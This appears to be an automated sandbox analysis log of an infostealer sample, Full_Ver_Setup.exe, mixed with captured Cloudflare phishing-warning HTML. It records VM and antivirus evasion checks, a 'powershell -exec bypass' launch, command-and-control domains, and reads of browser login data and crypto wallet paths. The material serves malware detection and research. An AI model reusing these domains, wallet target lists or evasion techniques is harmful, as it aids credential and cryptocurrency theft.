<!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="Y0.m3tWOgXwCJmvny1XQKkMDMWzKl6dWzxBD26bzmmI-1734906652-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <Jump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0323AD96 push eax; mov dword ptr [esp], D1D2D3D4h0_2_0323ADA4
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0323DC36 push eax; mov dword ptr [esp], 060504D3h0_2_0323DC3B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07CF2E8B push FFFFFF8Bh; retf 4_2_07CF2E94
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2356Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1274Jump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe TID: 736Thread sleep time: -210000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe TID: 2692Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5688Thread sleep count: 2356 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5668Thread sleep count: 1274 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1892Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 564Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: Full_Ver_Setup.exe, 00000000.00000003.1873688893.00000000007DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW6t
              Source: Full_Ver_Setup.exe, 00000000.00000003.2012907807.0000000003F49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: e4qemuI
              Source: Full_Ver_Setup.exe, 00000000.00000002.2173229221.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1873688893.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000002.2173229221.0000000000788000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_032003C9 mov edx, dword ptr fs:[00000030h]0_2_032003C9
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_03200989 mov eax, dword ptr fs:[00000030h]0_2_03200989
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_03200FD8 mov eax, dword ptr fs:[00000030h]0_2_03200FD8
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_03200FD9 mov eax, dword ptr fs:[00000030h]0_2_03200FD9
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_03200D39 mov eax, dword ptr fs:[00000030h]0_2_03200D39
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Full_Ver_Setup.exeString found in binary or memory: rapeflowwj.lat
              Source: Full_Ver_Setup.exeString found in binary or memory: crosshuaht.lat
              Source: Full_Ver_Setup.exeString found in binary or memory: fannleadyn.click
              Source: Full_Ver_Setup.exeString found in binary or memory: discokeyus.lat
              Source: Full_Ver_Setup.exeString found in binary or memory: grannyejh.lat
              Source: Full_Ver_Setup.exeString found in binary or memory: energyaffai.lat
              Source: Full_Ver_Setup.exeString found in binary or memory: necklacebudi.lat
              Source: Full_Ver_Setup.exeString found in binary or memory: sustainskelet.lat
              Source: Full_Ver_Setup.exeString found in binary or memory: aspecteirs.lat
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!doctype html> <!--[if lt ie 7]> <html class="no-js ie6 oldie" lang="en-us"> <![endif]--> <!--[if ie 7]> <html class="no-js ie7 oldie" lang="en-us"> <![endif]--> <!--[if ie 8]> <html class="no-js ie8 oldie" lang="en-us"> <![endif]--> <!--[if gt ie 8]><!--> <html class="no-js" lang="en-us"> <!--<![endif]--> <head> <title>suspected phishing site | cloudflare</title> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="x-ua-compatible" content="ie=edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt ie 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte ie 10]><!--> <script> if (!navigator.cookieenabled) { window.addeventlistener('domcontentloaded', function () { var cookieel = document.getelementbyid('cookie-alert'); cookieel.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> warning</h4> <h2 style="margin: 16px 0;">suspected phishing</h2> <strong>this website has been reported for potential phishing.</strong> <p>phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">learn more</a> <form action="/cdn-cgi/phish-bypass" method="get" enctype="text/plain"> <input type="hidden" name="atok" value="y0.m3twogxwcjmvny1xqkkmdmwzkl6dwzxbd26bzmmi-1734906652-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">ignore & proceed</button> </form> </p> </div> <
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!doctype html> <!--[if lt ie 7]> <html class="no-js ie6 oldie" lang="en-us"> <![endif]--> <!--[if ie 7]> <html class="no-js ie7 oldie" lang="en-us"> <![endif]--> <!--[if ie 8]> <html class="no-js ie8 oldie" lang="en-us"> <![endif]--> <!--[if gt ie 8]><!--> <html class="no-js" lang="en-us"> <!--<![endif]--> <head> <title>suspected phishing site | cloudflare</title> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="x-ua-compatible" content="ie=edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt ie 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte ie 10]><!--> <script> if (!navigator.cookieenabled) { window.addeventlistener('domcontentloaded', function () { var cookieel = document.getelementbyid('cookie-alert'); cookieel.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> warning</h4> <h2 style="margin: 16px 0;">suspected phishing</h2> <strong>this website has been reported for potential phishing.</strong> <p>phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">learn more</a> <form action="/cdn-cgi/phish-bypass" method="get" enctype="text/plain"> <input type="hidden" name="atok" value="y0.m3twogxwcjmvny1xqkkmdmwzkl6dwzxbd26bzmmi-1734906652-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">ignore & proceed</button> </form> </p> </div> <Jump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Full_Ver_Setup.exe, 00000000.00000003.2012801885.0000000000862000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1998784204.0000000000862000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1998301688.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1998301688.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.2012326508.0000000000861000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: Full_Ver_Setup.exe PID: 6476, type: MEMORYSTR
              Source: Yara matchFile source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *electrum*
              Source: Full_Ver_Setup.exe, 00000000.00000003.1992604404.0000000000810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
              Source: Full_Ver_Setup.exe, 00000000.00000003.1992604404.0000000000810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
              Source: Full_Ver_Setup.exe, 00000000.00000003.1922392393.0000000000832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets`e
              Source: Full_Ver_Setup.exe, 00000000.00000003.1992604404.0000000000810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *exodus*
              Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *ethereum*
              Source: Full_Ver_Setup.exe, 00000000.00000003.1971070887.00000000007C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: Full_Ver_Setup.exe, 00000000.00000003.1970914700.0000000000839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: Full_Ver_Setup.exe, 00000000.00000003.1922088795.000000000084D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live]$
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
